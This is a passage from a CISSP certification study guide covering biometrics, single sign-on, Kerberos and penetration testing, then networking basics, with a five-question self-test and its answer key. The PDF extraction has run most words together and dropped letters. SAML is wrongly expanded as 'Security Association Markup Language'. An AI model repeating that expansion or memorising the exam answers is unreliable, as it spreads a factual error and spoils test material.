includewhorls,ridges,bifurcation,andothers.Figure1.3showsminutiae
types(fromleft)bifurcation,ridgeending,core,anddelta.

10

FIGURE1.3 Fingerprintminutiae.

Retina scan

Aretinascanisalaserscanofthecapillariesthatfeedtheretinaofthebackof
theeye.Thiscanseempersonallyintrusivebecausethelightbeammust
directlyenterthepupil,andtheuserusuallyneedstopresstheireyeuptoa
laserscannereyecup.Thelaserscanmapsthebloodvesselsoftheretina.
Healthinformationoftheusercanbegainedthrougharetinascan:
conditionssuchaspregnancyanddiabetescanbedetermined,whichmay
raiselegitimateprivacyissues.Becauseoftheneedforcloseproximityofthe
scannerinaretinascan,exchangeofbodilyuidsispossiblewhenusing
retinascanningasameansofaccesscontrol.

E x a m Wa r n i n g
Retinascansarerarelyusedbecauseofhealthrisksandinvasionof
privacyissues.Alternativesshouldbeconsideredforbiometriccontrols
thatriskexchangeofbodilyuidorraiselegitimateprivacyconcerns.

Iris scan

Anirisscanisapassivebiometriccontrol.Acameratakesapictureoftheiris
(thecoloredportionoftheeye)andthencomparesphotoswithinthe

authenticationdatabase.Thisalsoworksthroughcontactlensesandglasses.
Eachpersonstwoirisesareunique,eventwinsirises.Benetsofirisscans
includehighaccuracy,passivescanning(whichmaybeaccomplished
withoutthesubjectsknowledge),andnoexchangeofbodilyuids.
Hand geometry

Inhandgeometrybiometriccontrol,measurementsaretakenfromspecic
pointsonthesubjectshand:Thedevicesuseasimpleconceptofmeasuring
andrecordingthelength,width,thickness,andsurfaceareaofanindividuals
handwhileguidedonaplate.

Handgeometrydevicesarefairlysimple

andcanstoreinformationinasli leas9bytes.
Keyboard dynamics

Keyboarddynamicsreferstohowhardapersonpresseseachkeyandthe
rhythmbywhichthekeysarepressed.Surprisingly,thistypeofaccess
controlischeaptoimplementandcanbeeective.Aspeoplelearnhowto
typeanduseacomputerkeyboard,theydevelopspecichabitsthatare
diculttoimpersonate,althoughnotimpossible.
Dynamic signature

Dynamicsignaturesmeasuretheprocessbywhichsomeonesignshisorher
name.Thisprocessissimilartokeyboarddynamics,exceptthatthismethod
measuresthehandwritingofthesubjectswhiletheysigntheirname.
Measuringtime,pressure,loopsinthesignature,andbeginningandending
pointsallhelptoensuretheuserisauthentic.
Voiceprint

Avoiceprintmeasuresthesubjectstoneofvoicewhilestatingaspecic
sentenceorphrase.Thistypeofaccesscontrolisvulnerabletoreplaya acks
(replayingarecordedvoice),sootheraccesscontrolsmustbeimplemented
alongwiththevoiceprint.Onesuchcontrolrequiressubjectstostaterandom
words,protectingagainstana ackerplayingprerecordedspecicphrases.
Anotherissueispeoplesvoicesmaysubstantiallychangeduetoillness,
resultinginafalserejection.
Facial scan

Facialscantechnologyhasgreatlyimprovedoverthepastfewyears.Facial
scanning(alsocalledfacialrecognition)istheprocessofpassivelytakinga

pictureofasubjectsfaceandcomparingthatpicturetoaliststoredina
database.Althoughnotfrequentlyusedforbiometricauthenticationcontrol
duetothehighcost,lawenforcementandsecurityagenciesusefacial
recognitionandscanningtechnologiesforbiometricidenticationtoimprove
securityofhighvalued,publiclyaccessibletargets.
Someplace you are

Someplaceyouaredescribeslocationbasedaccesscontrolusingtechnologies
suchastheglobalpositioningsystem(GPS),IPaddressbasedgeolocation,or
thephysicallocationforapointofsalepurchase.Thesecontrolscandeny
accessifthesubjectisintheincorrectlocation.

ACCESS CONTROL TECHNOLOGIES

Thereareseveraltechnologiesusedfortheimplementationofaccesscontrols.
Aseachtechnologyispresented,itisimportanttoidentifywhatisunique
abouteachtechnicalsolution.
Single sign-on

SingleSignOn(SSO)allowsmultiplesystemstouseacentralauthentication
server(AS).Thisallowsuserstoauthenticateonceandthenaccessmultiple,
dierentsystems.Italsoallowssecurityadministratorstoadd,change,or
revokeuserprivilegesononecentralsystem.
TheprimarydisadvantagetoSSOisitmayallowana ackertogainaccessto
multipleresourcesaftercompromisingoneauthenticationmethod,suchasa
password.SSOshouldalwaysbeusedwithmultifactorauthenticationforthis
reason.
Federated identity management

FederatedIdentityManagement(FIdM)appliesSingleSignOnatamuchwider
scale:rangingfromcrossorganizationtoInternetscale.Itissometimes
simplycalledIdentityManagement(IdM).FIdMmayuseOpenIDorSAML
(SecurityAssociationMarkupLanguage).
AccordingtoEDUCAUSE,Identitymanagementreferstothepolicies,
processes,andtechnologiesthatestablishuseridentitiesandenforcerules
aboutaccesstodigitalresources.Inacampusse ing,manyinformation
systemssuchasemail,learningmanagementsystems,librarydatabases,

andgridcomputingapplicationsrequireuserstoauthenticatethemselves
(typicallywithausernameandpassword).Anauthorizationprocessthen
determineswhichsystemsanauthenticateduserispermi edtoaccess.With
anenterpriseidentitymanagementsystem,ratherthanhavingseparate
credentialsforeachsystem,ausercanemployasingledigitalidentityto
accessallresourcestowhichtheuserisentitled.Federatedidentity
managementpermitsextendingthisapproachabovetheenterpriselevel,
creatingatrustedauthorityfordigitalidentitiesacrossmultiple
organizations.Inafederatedsystem,participatinginstitutionsshareidentity
a ributesbasedonagreeduponstandards,facilitatingauthenticationfrom
othermembersofthefederationandgrantingappropriateaccesstoonline
resources.Thisapproachstreamlinesaccesstodigitalassetswhileprotecting
restrictedresources.

Kerberos

Kerberosisathirdpartyauthenticationservicethatmaybeusedtosupport
SingleSignOn.Kerberos(h p://www.kerberos.org/)wasthenameofthe
threeheadeddogthatguardedtheentrancetoHades(alsocalledCerberus)
inGreekmythology.
Kerberosusessymmetricencryptionandprovidesmutualauthenticationof
bothclientsandservers.Itprotectsagainstnetworksningandreplay
a acks.ThecurrentversionofKerberosisversion5,describedbyRFC4120
(h p://www.ietf.org/rfc/rfc4120.txt).

FastFacts
Kerberoshasthefollowingcomponents:
Principal:Client(user)orservice
Realm:AlogicalKerberosnetwork
Ticket:Datathatauthenticatesaprincipalsidentity
Credentials:Aticketandaservicekey
KDC:KeyDistributionCenter,whichauthenticatesprincipals

TGS:TicketGrantingService
TGT:TicketGrantingTicket
C/S:Client/Server,regardingcommunicationsbetweenthetwo

SESAME

SESAMEisSecureEuropeanSystemforApplicationsinamultivendor
environment,asinglesignonsystemthatsupportsheterogeneous
environments.SESAMEcanbethoughtofasasequelofsortstoKerberos,
SESAMEaddstoKerberos:heterogeneity,sophisticatedaccesscontrol
features,scalabilityofpublickeysystems,be ermanageability,auditand
delegation.

Ofthoseimprovements,theadditionofpublickey

(asymmetric)encryptionisthemostcompelling.Itaddressesoneofthe
biggestweaknessesinKerberos:theplaintextstorageofsymmetrickeys.
SESAMEusesPrivilegeA ributeCerticates(PACs)inplaceofKerberos
tickets.MoreinformationonSESAMEisavailableat
h ps://www.cosic.esat.kuleuven.be/sesame/.

ASSESSING ACCESS CONTROL

Anumberofprocessesexisttoassesstheeectivenessofaccesscontrol.Tests
withanarrowerscopeincludepenetrationtests,vulnerabilityassessments,
andsecurityaudits.Asecurityassessmentisabroadertestthatmayinclude
narrowertests,suchaspenetrationtests,assubsections.
Penetration testing

Apenetrationtesterisawhitehathackerwhoreceivesauthorizationto
a empttobreakintoanorganizationsphysicalorelectronicperimeter(and
sometimesboth).Penetrationtests(calledpentestsforshort)aredesignedto
determinewhetherblackhathackerscoulddothesame.Theyareanarrow,
butoftenuseful,test,especiallyifthepenetrationtesterissuccessful.
Penetrationtestsmayincludethefollowingtests:
Network(Internet)

Network(internalorDMZ)
Wardialing
Wireless
Physical(a empttogainentranceintoafacilityorroom)
Wireless
Networka acksmayleverageclientsidea acks,serversidea acks,orWeb
applicationa acks.SeeChapter6,Domain6:SecurityArchitectureand
Designformoreinformationonthesea acks.Wardialingusesmodemto
dialaseriesofphonenumbers,lookingforanansweringmodemcarriertone
(thepenetrationtesterthena emptstoaccesstheansweringsystem);the
namederivesfromthe1983movieWarGames.
Socialengineeringusesthehumanmindtobypasssecuritycontrols.Social
engineeringmaybeusedincombinationwithmanytypesofa acks,
especiallyclientsidea acksorphysicaltests.Anexampleofasocial
engineeringa ackcombinedwithaclientsidea ackisemailingmalware
withasubjectlineofCategory5HurricaneisabouttohitFlorida!
Azeroknowledgetestisblind;thepenetrationtesterbeginswithnoexternal
ortrustedinformationandbeginsthea ackwithpublicinformationonly.A
fullknowledgetestprovidesinternalinformationtothepenetrationtester,
includingnetworkdiagrams,policiesandprocedures,andsometimesreports
frompreviouspenetrationtesters.Partialknowledgetestsareinbetweenzero
andfullknowledge:thepenetrationtesterreceivessomelimitedtrusted
information.
Vulnerability testing

Vulnerabilityscanning(alsocalledvulnerabilitytesting)scansanetworkor
systemforalistofpredenedvulnerabilitiessuchassystem
misconguration,outdatedsoftware,oralackofpatching.Avulnerability
testingtoolsuchasNessus(h p://www.nessus.org)orOpenVAS
(h p://www.openvas.org)maybeusedtoidentifythevulnerabilities.
Security audits

Asecurityauditisatestagainstapublishedstandard.Organizationsmaybe
auditedforPCIDSS(PaymentCardIndustryDataSecurityStandard)
compliance,forexample.PCIDSSincludesmanyrequiredcontrols,suchas
rewalls,specicaccesscontrolmodels,andwirelessencryption.Anauditor
thenveriesasiteororganizationmeetsthepublishedstandard.
Security assessments

Securityassessmentsareaholisticapproachtoassessingtheeectivenessof
accesscontrol.Insteadoflookingnarrowlyatpenetrationtestsor
vulnerabilityassessments,securityassessmentshaveabroaderscope.

Summary of exam objectives

Ifonethinksofthecastleanalogyforsecurity,accesscontrolwouldbethe
moatandcastlewalls.Accesscontrolensuresthattheborderprotection
mechanisms,inbothalogicalandphysicalviewpoint,aresecured.The
purposeofaccesscontrolistoallowauthorizedusersaccesstoappropriate
dataanddenyaccesstounauthorizedusersthisisalsoknownaslimiting
subjectsaccesstoobjects.Eventhoughthistaskisacomplexandinvolved
one,itispossibletoimplementastrongaccesscontrolprogramwithout
overburdeningtheuserswhorelyonaccesstothesystem.
ProtectingtheCIAtriadisanotherkeyaspecttoimplementingaccess
controls.Maintainingcondentiality,integrity,andavailabilityisofutmost
importance.MaintainingsecurityovertheCIAofasystemmeansenacting
specicproceduresfordataaccess.Theseprocedureswillchangedepending
onthefunctionalitytheusersrequireandthesensitivityofthedatastoredon
thesystem.

TOP FIVE TOUGHEST QUESTIONS

Questions1and2arebasedonthisscenario:
Yourcompanyhashiredathirdpartycompanytoconductapenetrationtest.
YourCIOwouldliketoknowifexploitationofcriticalbusinesssystemsis
possible.Thetworequirementsthecompanyhasare:
Thetestswillbeconductedonlive,businessfunctionalnetworks.These
networksmustbefunctionalinorderforbusinesstorunandcannotbeshut

down,evenforanevaluation.
Thecompanywantsthemostindepthtestpossible.
1.Whatkindoftestshouldberecommended?
A.Zeroknowledge
B.Partialknowledge
C.Fullknowledge
D.Vulnerabilitytesting
2.Whileconductingthepenetrationtest,thetesterdiscoversacritical
businesssystemiscurrentlycompromised.Whatshouldthetesterdo?
A.Notetheresultsinthepenetrationtestingreport
B.ImmediatelyendthepenetrationtestandcalltheCIO
C.Removethemalware
D.Shutthesystemdown
3.Whattypeofpasswordcrackingcanrecoverthemostpasswords?
A.Dictionary
B.Hybrid
C.Bruteforce
D.Rainbowtable
4.Apolicythatstatesausermusthaveabusinessrequirementtoviewdata
beforea emptingtodosoisanexampleofenforcingwhat?
A.Leastprivilege
B.Needtoknow

C.Rotationofduties
D.Separationofduties
5.WhattechniquewouldraisetheFalseAcceptRate(FAR)andLowerthe
FalseRejectRate(FRR)inangerprintscanningsystem?
A.Decreasetheamountofminutiaethatisveried
B.Increasetheamountofminutiaethatisveried
C.Lengthentheenrollmenttime
D.Lowerthethroughputtime

SELF-TEST QUICK ANSWER KEY

1.Correctanswerandexplanation:C.Cisthecorrectanswerbecausethe
customerwantsafullevaluationbutisworriedbecauseoftheimportanceof
thenetwork.Becausethecustomerwantsasfullofanevaluationaspossible
butdoesnotwantthenetworkinanykindofjeopardy,afullknowledge
assessmentisnecessarybecauseonlyafullknowledgeassessmentwillallow
forthemostindepthanalysiswiththeleastamountofrisktothenetwork.
Incorrectanswersandexplanations:A,B,andD.Aisincorrectbecausea
zeroknowledgetestwillnotproducethemostindepthassessmentofthe
network.Bisincorrectbecauseapartialknowledgetest,althoughbe erthan
zeroknowledge,stillwillnotproducethenecessaryassessment.Dis
incorrectbecausevulnerabilitytestingdoesnotexploitsystems,whichisa
requirementofthetest.
2.Correctanswerandexplanation:B.AnswerBiscorrect;whendiscoveringa
livemaliciousintrusion,thepenetrationtestershouldimmediatelyendthe
penetrationtestandnotifytheclientoftheintrusion.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.Notingtheresultsisnotenough:systemintegrity,anddata
integrityandcondentialityarecompromisedoratrisk;immediateactionis
required.Removingthemalwaremaycausemoredamageand/oralertthe
a ackerstothepenetrationtesterspresence.A ackersmaybecomemore
maliciousiftheybelievetheyhavebeendiscovered.Shu ingthesystem
downwillharmavailability(andpossiblyintegrity),andwilldestroyany

evidencethatexistsinmemory.
3.Correctanswerandexplanation:C.AnswerCiscorrect;bruteforcea acks
willrecoverthemostpasswords.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Dictionaryandhybridwillonlycracksomepasswords.Most
rainbowtablesareabletorecovermost,butnotall,passwords.Rainbow
tablesarealsoineectiveagainstsaltedhashes.
4.Correctanswerandexplanation:B.AnswerBiscorrect;needtoknow
meanstheusermusthaveaneed(requirement)toaccessaspecicobject
beforedoingso.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.Leastprivilegeislessgranularthanneedtoknow:usershavethe
leastamountofprivilegetodotheirjobs,butobjectsarestilltypically
groupedtogether(suchasallowingaccesstoallbackuptapesforabackup
administrator).Separationofdutiesisdesignedtodividesensitivetasks
amongmultiplesubjects.Rotationofdutiesisdesignedtomitigatecollusion.
5.Correctanswerandexplanation:A.AnswerAiscorrect;decreasingthe
amountofminutiawillmaketheaccuracyofthesystemlower,whichlower
falserejectsbutraisefalseaccepts.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.Increasingtheamountofminutiaewillmakethesystemmore
accurate,increasingtheFRRandloweringtheFAR.Enrollmentand
throughputtimearenotdirectlyconnectedtoFARandFRR.
10

Ibid.

IdentityManagementDesignGuidewithIBMTivoliIdentityManager.

h p://www.redbooks.ibm.com/redbooks/pdfs/sg246996.pdf[accessedMay5,
2013].
2

RFC1994CHAP.h p://www.faqs.org/rfcs/rfc1994.html[accessedMay5,

2013].
3

Ibid.

PasswordProtectionforModernOperatingSystems.

h p://static.usenix.org/publications/login/200406/pdfs/alexander.pdf
[accessedMay5,2013].
5

ISACA,ITAuditandAssuranceGuidelineG36,BiometricControls.

h p://www.isaca.org/standards[accessedMay5,2013].
6

NISTTechBeatMarch16,2006.

h p://www.nist.gov/public_aairs/techbeat/tb2006_0316.htm[accessedMay
5,2013].
7

HandGeometry.

h p://www.biometrics.gov/Documents/HandGeometry.pdf[accessedMay5,
2013].
8

HandGeometry.

h p://www.biometrics.gov/Documents/HandGeometry.pdf[accessedMay5,
2013].
9

SESAMEinaNutshell.

h p://www.cosic.esat.kuleuven.be/sesame/html/sesame_what.html[accessed
May5,2013].

CHAPTER2

Domain 2: Telecommunications a
nd Network Security
Abstract
Domain2:TelecommunicationsandNetworkSecurity,coveredinthis
chapter,representsavastandtechnicaldomaintobetested.Oneofthemost
technicalofthedomainsincludedintheCISSP,Domain2requiresan
understandingofnetworkingandtheTCP/IPsuiteofprotocolsatafairly
substantiallevelofdepth.Networkinghardwaresuchasrouters,switches,
andthelesscommonrepeaters,hubs,andbridgesareallpresentedwithin
thisdomain.TechnicalaspectsofIntrusionDetectionSystems(IDS),Intrusion
PreventionSystems(IPS),VirtualPrivateNetworks(VPN),802.11wireless,
RadioFrequencyID(RFID),andalsoauthenticationdevicesandprotocolsare
foundinthislargedomain.Morerecentlyaddedtopicssuchasendpoint
security,remoteaccess,andvirtualizationarealsorepresentedinthischapter.

KEYWORDS
Ethernet;OSImodel;TCP/IP;Packetswitchednetwork;Switch;Router;
Packetlterrewall;Statefulrewall;Proxyrewall;802.11;802.1x;IPsec;
VoIP;Remotemeetingtechnology

Exam Objectives in This Chapter

NetworkArchitectureandDesign
NetworkDevicesandProtocols
SecureCommunications

Introduction

Introduction
TelecommunicationsandNetworkSecurityisfundamentaltoourmodern
life.TheInternet,theWorldWideWeb,onlinebanking,instantmessaginge
mail,andmanyothertechnologiesrelyonNetworkSecurity:ourmodern
worldcannotexistwithoutit.TelecommunicationsandNetworkSecurity
(oftencalledtelecommunications,forshort)focusesonthecondentiality,
integrity,andavailabilityofdatainmotion.
TelecommunicationsisoneofthelargestdomainsintheCommonBodyof
Knowledgeandcontainsmoreconceptsthananyotherdomain.Thisdomain
isalsooneofthemosttechnicallydeepdomains,requiringtechnical
knowledgedowntopackets,segments,frames,andtheirheaders.
Understandingthisdomainiscriticaltoensuresuccessontheexam.

NETWORK ARCHITECTURE AND DESIGN

Ourrstsectionisnetworkarchitectureanddesign.Wewilldiscusshow
networksshouldbedesignedandthecontrolstheymaycontain,focusingon
deployingdefenseindepthstrategiesandweighingthecostandcomplexity
ofanetworkcontrolversusthebenetprovided.
Fundamental network concepts

BeforewecandiscussspecicTelecommunicationsandNetworkSecurity
concepts,weneedtounderstandthefundamentalconceptsbehindthem.
Termslikebroadbandareoftenusedinformally:theexamrequiresaprecise
understandingofinformationsecurityterminology.
Simplex, half-duplex, and full-duplex communication

Simplexcommunicationisoneway,likeacarradiotunedtoamusicstation.
Halfduplexcommunicationsendsorreceivesatonetimeonly(not
simultaneously),likeawalkietalkie.Fullduplexcommunicationssendsand
receivessimultaneously,liketwopeoplehavingafacetofaceconversation.
LANs, WANs, MANs, and PANs

ALANisaLocalAreaNetwork.ALANisacomparativelysmallnetwork,
typicallyconnedtoabuildingoranareawithinone.AMANisa
MetropolitanAreaNetwork,whichistypicallyconnedtoacity,azipcode,
acampus,oranocepark.AWANisaWideAreaNetwork,typically
coveringcities,states,orcountries.

Attheotherendofthespectrum,thesmallestofthesenetworksarePANs:
PersonalAreaNetworks,witharangeof100mormuchless.Lowpower
wirelesstechnologiessuchasBluetoothareusedtocreatePANs.
Internet, Intranet, and Extranet

TheInternetisaglobalcollectionofpeerednetworksrunningTCP/IP,
providingbesteortservice.AnIntranetisaprivatelyownednetwork
runningTCP/IP,suchasacompanynetwork.AnExtranetisaconnection
betweenprivateIntranets,suchasconnectionstobusinesspartnerIntranets.
The OSI model

TheOSI(OpenSystemInterconnection)ReferenceModelisaLayered
networkmodel.Themodelisabstract:wedonotdirectlyruntheOSImodel
inoursystems(mostnowusetheTCP/IPmodel);itisusedasareference
point,soLayer1(physical)isuniversallyunderstood,whetheryouare
runningEthernetorATM,forexample.LayerXinthisbookreferstothe
OSImodel.
TheOSImodelhassevenlayers,asshowninTable2.1.Thelayersmaybe
listedintoptobo omorbo omtotoporder.Usingthela er,theyare
Physical,DataLink,Network,Transport,Session,Presentation,andApplication.
Table2.1
TheOSIModel

Layer 1: Physical

ThePhysicalLayerisLayer1oftheOSImodel.Layer1describesunitsof
datasuchasbitsrepresentedbyenergy(suchaslight,electricity,orradio
waves)andthemediumusedtocarrythem(suchascopperorberoptic

cables).WLANshaveaPhysicalLayer,eventhoughwecannotphysically
touchit.
CablingstandardssuchasThinnet,Thicknet,andUnshieldedTwistedPair
(UTP)existatLayer1,amongmanyothers.Layer1devicesincludehubsand
repeaters.
Layer 2: Data Link

TheDataLinkLayerhandlesaccesstothePhysicalLayeraswellasLocal
AreaNetworkcommunication.AnEthernetcardanditsMAC(MediaAccess
Control)addressareatLayer2,asareswitchesandbridges.
Layer2isdividedintotwosublayers:MediaAccessControl(MAC)and
LogicalLinkControl(LLC).TheMACLayertransfersdatatoandfromthe
PhysicalLayer.LLChandlesLANcommunications.MACtouchesLayer1,
andLLCtouchesLayer3.
Layer 3: Network

TheNetworkLayerdescribesrouting:movingdatafromasystemonone
LANtoasystemonanother.IPaddressesandroutersexistatLayer3.Layer
3protocolsincludeIPv4andIPv6,amongothers.
Layer 4: Transport

TheTransportLayerhandlespacketsequencing,owcontrol,anderror
detection.TCPandUDPareLayer4protocols.
Layer4makesanumberoffeaturesavailable,suchasresendingor
resequencingpackets.Takingadvantageofthesefeaturesisaprotocol
implementationdecision.Aswewillseelater,TCPtakesadvantageofthese
features,attheexpenseofspeed.Manyofthesefeaturesarenotimplemented
inUDP,whichchoosesspeedoverreliability.
Layer 5: Session

TheSessionLayermanagessessions,whichprovidemaintenanceon
connections.Mountingaleshareviaanetworkrequiresanumberof
maintenancesessions,suchasRemoteProcedureCalls(RPCs):theseexistat
theSessionLayer.AgoodwaytoremembertheSessionLayersfunctionis
connectionsbetweenapplications.TheSessionLayerusessimplex,half
duplex,andfullduplexcommunication.

E x a m Wa r n i n g
TheTransportandSessionLayersareoftenconfused.Forexample,is
maintenanceofconnectionsaTransportLayerorSessionLayerissue?
PacketsaresequencedattheTransportLayer,andnetworklesharescan
beremountedattheSessionLayer:youmayconsidereithertobe
maintenance.Wordslikemaintenanceimplymoreworkthanpacket
sequencingorretransmission:itrequiresheavierlifting,like
remountinganetworksharethathasbeenunmounted,soSessionLayer
isthebestanswer.

Layer 6: Presentation

ThePresentationLayerpresentsdatatotheapplication(anduser)ina
comprehensibleway.PresentationLayerconceptsincludedataconversion,
characterssetssuchasASCII,andimageformatssuchasGIF(Graphics
InterchangeFormat),JPEG(JointPhotographicExpertsGroup),andTIFF
(TaggedImageFileFormat).
Layer 7: Application

TheApplicationLayeriswhereyouinterfacewithyourcomputer
application.YourWebbrowser,wordprocessor,andinstantmessagingclient
existatLayer7.TheprotocolsTelnetandFTPareApplicationLayer
protocols.
The TCP/IP model

TheTCP/IPmodel(TransmissionControlProtocol/InternetProtocol)isa
popularnetworkmodelcreatedbytheU.S.DefenseAdvancedResearch
ProjectsAgencyinthe1970s.TCP/IPisaninformalname(namedafterthe
rsttwoprotocolscreated);theformalnameistheInternetProtocolSuite.
TheTCP/IPmodelissimplerthantheOSImodel,asshowninTable2.2.

Table2.2
TheOSIModelvs.TCP/IPModel

WhileTCPandIPreceivetopbilling,TCP/IPisactuallyasuiteofprotocols
includingUDP(UserDatagramProtocol)andICMP(InternetControl
MessageProtocol),amongmanyothers.
Network Access Layer

TheNetworkAccessLayeroftheTCP/IPmodelcombinesLayers1(Physical)
and2(DataLink)oftheOSImodel.ItdescribesLayer1issuessuchasenergy,
bits,andthemediumusedtocarrythem(copper,ber,wireless,etc.).Italso
describesLayer2issuessuchasconvertingbitsintoprotocolunitssuchas
Ethernetframes,MAC(MediaAccessControl)addresses,andNetwork
InterfaceCards(NICs).
Internet Layer

TheInternetLayeroftheTCP/IPmodelalignswiththeLayer3(Network)
LayeroftheOSImodel.ThisiswhereIPaddressesandroutinglive.When
dataistransmi edfromanodeononeLANtoanodeonadierentLAN,the
InternetLayerisused.IPv4,IPv6,ICMP,androutingprotocols(among
others)areInternetLayerTCP/IPprotocols.
Host-to-Host Transport Layer

TheHosttoHostTransportLayer(sometimescalledeitherHosttoHostor,
morecommonly,Transportalone;thisbookwilluseTransport)connects
theInternetLayertotheApplicationLayer.Itiswhereapplicationsare
addressedonanetwork,viaports.TCPandUDParethetwoTransportLayer
protocolsofTCP/IP.
Application Layer

Application Layer

TheTCP/IPApplicationLayercombinesLayers5through7(Session,
Presentation,andApplication)oftheOSImodel.Mostoftheseprotocolsuse
aclientserverarchitecture,whereaclient(suchasssh)connectstoalistening
server(calledadaemononUNIXsystems)suchassshd.Theclientsand
serversuseeitherTCPorUDP(andsometimesboth)asaTransportLayer
protocol.TCP/IPApplicationLayerprotocolsincludeSSH,Telnet,andFTP,
amongmanyothers.
MAC addresses

AMediaAccessControl(MAC)addressistheuniquehardwareaddressofan
Ethernetnetworkinterfacecard(NIC),typicallyburnedinatthefactory.
MACaddressesmaybechangedinsoftware.

D i d Yo u K n o w ?
Historically,MACaddresseswere48bitslong.Theyhavetwohalves:the
rst24bitsistheOrganizationallyUniqueIdentier(OUI)andthelast
24bitsisaserialnumber(formallycalledanextensionidentier).

EUI-64 MAC addresses

TheIEEEcreatedtheEUI64(ExtendedUniqueIdentier)standardfor64bit
MACaddresses.TheOUIisstill24bits,buttheserialnumberis40bits.This
allowsfarmoreMACaddresses,comparedwith48bitaddresses.IPv6
autocongurationiscompatiblewithbothtypesofMACaddresses.
IPv4

IPv4isInternetProtocolversion4,commonlycalledIP.Itisthe
fundamentalprotocoloftheInternet,designedinthe1970stosupportpacket
switchednetworkingfortheU.S.DefenseAdvancedResearchProjects
Agency(DARPA).IPv4wasusedfortheARPAnet,whichlaterbecamethe
Internet.
IPisasimpleprotocol,designedtocarrydataacrossnetworks.Itissosimple
thatitrequiresahelperprotocolcalledICMP(seebelow).Ifconnectionsor

reliabilityisrequired,itmustbeprovidedbyahigherlevelprotocolcarried
byIP,suchasTCP.
IPv4uses32bitsourceanddestinationaddresses,usuallyshownindo ed
32

quadformat,suchas192.168.2.4.A32bitaddresseldallows2 ,or
nearly4.3billion,addresses.
IPv6

IPv6isthesuccessortoIPv4,featuringfarlargeraddressspace(128bit
addressescomparedtoIPv4s32bits),simplerrouting,andsimpleraddress
assignment.AlackofIPv4addresseswastheprimaryfactorthatledtothe
creationofIPv6.

D i d Yo u K n o w ?
SystemsmaybedualstackandusebothIPv4andIPv6simultaneously.
HostsmayalsoaccessIPv6networksviaIPv4;thisiscalledtunneling.

TCP

TCPistheTransmissionControlProtocol,areliableLayer4protocol.TCP
usesathreewayhandshaketocreatereliableconnectionsacrossanetwork.
TCPcanreordersegmentsthatarriveoutoforderandretransmitmissing
segments.
TCP ports

TCPconnectsfromasourceporttoadestinationport.TheTCPporteldis
16bits,allowingportnumbersfrom0to65535.
Therearetwotypesofports:reservedandephemeral.Areservedportis1023or
lower;ephemeralportsare102465535.Mostoperatingsystemsrequire
superuserprivilegestoopenareservedport.Anyusermayopenan(unused)
ephemeralport.
UDP

UDPistheUserDatagramProtocol,asimplerandfastercousintoTCP.UDP

iscommonlyusedforapplicationsthatarelossy(canhandlesomepacket
loss),suchasstreamingaudioandvideo.Itisalsousedforqueryresponse
applications,suchasDNSqueries.
ICMP

ICMPistheInternetControlMessageProtocol,ahelperprotocolthathelps
Layer3.ICMPisusedtotroubleshootandreporterrorconditions:Without
ICMPtohelp,IPwouldfailwhenfacedwithroutingloops,ports,hosts,or
networksthataredown,etc.ICMPhasnoconceptofports,asTCPandUDP
do,butinsteadusestypesandcodes.
Application-Layer TCP/IP protocols and concepts

AmultitudeofprotocolsexistatTCP/IPsApplicationLayer,whichcombines
thePresentation,Session,andApplicationLayersoftheOSImodel.
Telnet

Telnetprovidesterminalemulationoveranetwork.Telnetserverslistenon
TCPport23.Telnetwasthestandardwaytoaccessaninteractivecommand
shelloveranetworkforover20years.
Telnetisweakbecauseitprovidesnocondentiality:alldatatransmi ed
duringaTelnetsessionisplaintext,includingtheusernameandpassword
usedtoauthenticatetothesystem.
FTP

FTPistheFileTransferProtocol,usedtotransferlestoandfromservers.
LikeTelnet,traditionalFTPhasnocondentialityorintegrityandshouldnot
beusedtotransfersensitivedataoverinsecurechannels.
SSH

SSHwasdesignedasasecurereplacementforTelnet,FTP,andtheUNIXR
commands(rlogin,rshell,etc).Itprovidescondentiality,integrity,and
secureauthentication,amongotherfeatures.SSHcanalsobeusedtosecurely
tunnelotherprotocols,suchasHTTP.SSHserverslistenonTCPport22by
default.
SMTP, POP, and IMAP

SMTPistheSimpleMailTransferProtocol,usedtotransferemailbetween
servers.SMTPserverslistenonTCPport25.POPv3(PostOceProtocol)and

IMAP(InternetMessageAccessProtocol)areusedforclientserveremail
access,whichuseTCPports110and143,respectively.
DNS

DNSistheDomainNameSystem,adistributedglobalhierarchicaldatabase
thattranslatesnamestoIPaddressesandviceversa.DNSusesbothTCPand
UDP:smallanswersuseUDPport53;largeanswers(suchaszonetransfers)
useTCPport53.
HTTP and HTTPS

HTTPistheHypertextTransferProtocol,whichisusedtotransfer
unencryptedWebbaseddata.HTTPS(HypertextTransferProtocolSecure)
transfersencryptedWebbaseddataviaSSL/TLS.HTTPusesTCPport80,
andHTTPSusesTCPport443.HTML(HypertextMarkupLanguage)isused
todisplayWebcontent.
LAN technologies and protocols

LocalAreaNetworkconceptsfocusonLayer13technologiessuchas
networkcablingtypes,physicalandlogicalnetworktopologies,Ethernet,
FDDI,andothers.
Ethernet

EthernetoperatesatLayer2andisadominantLocalAreaNetworking
technologythattransmitsnetworkdataviaframes.Ethernetisbaseband(one
channel),soitmustaddressissuessuchascollisions,wheretwonodes
a empttotransmitdatasimultaneously.
WAN technologies and protocols

ISPsandotherlonghaulnetworkproviders,whosenetworksspanfrom
citiestocountries,oftenuseWideAreaNetworktechnologies.Manyofus
havehandsonexperienceconguringLANtechnologiessuchasconnecting
Cat5networkcabling;itislesscommontohavehandsonexperiencebuilding
WANs.
T1s, T3s, E1s, and E3s

Thereareanumberofinternationalcircuitstandards:themostprevalentare
Tcarriers(UnitedStates)andEcarriers(Europe).

FastFacts
Hereisasummaryofcommoncircuits:
AT1isadedicated1.544megabitcircuitthatcarries2464bitDS0
(DigitalSignal0)channels.
AT3is28bundledT1s,forminga44.736megabitcircuit.
AnE1isadedicated2.048megabitcircuitthatcarries30channels.
AnE3is16bundledE1s,forminga34.368megabitcircuit.

Frame Relay

FrameRelayisapacketswitchedLayer2WANprotocolthatprovidesnoerror
recoveryandfocusesonspeed.HigherlayerprotocolscarriedbyFrame
Relay,suchasTCP/IP,canbeusedtoprovidereliability.
FrameRelaymultiplexesmultiplelogicalconnectionsoverasinglephysical
connectiontocreateVirtualCircuits;thissharedbandwidthmodelisan
alternativetodedicatedcircuitssuchasT1s.APVC(PermanentVirtual
Circuit)isalwaysconnected,analogoustoarealdedicatedcircuitlikeaT1.A
SwitchedVirtualCircuit(SVC)setsupeachcall,transfersdata,and
terminatestheconnectionafteranidletimeout.
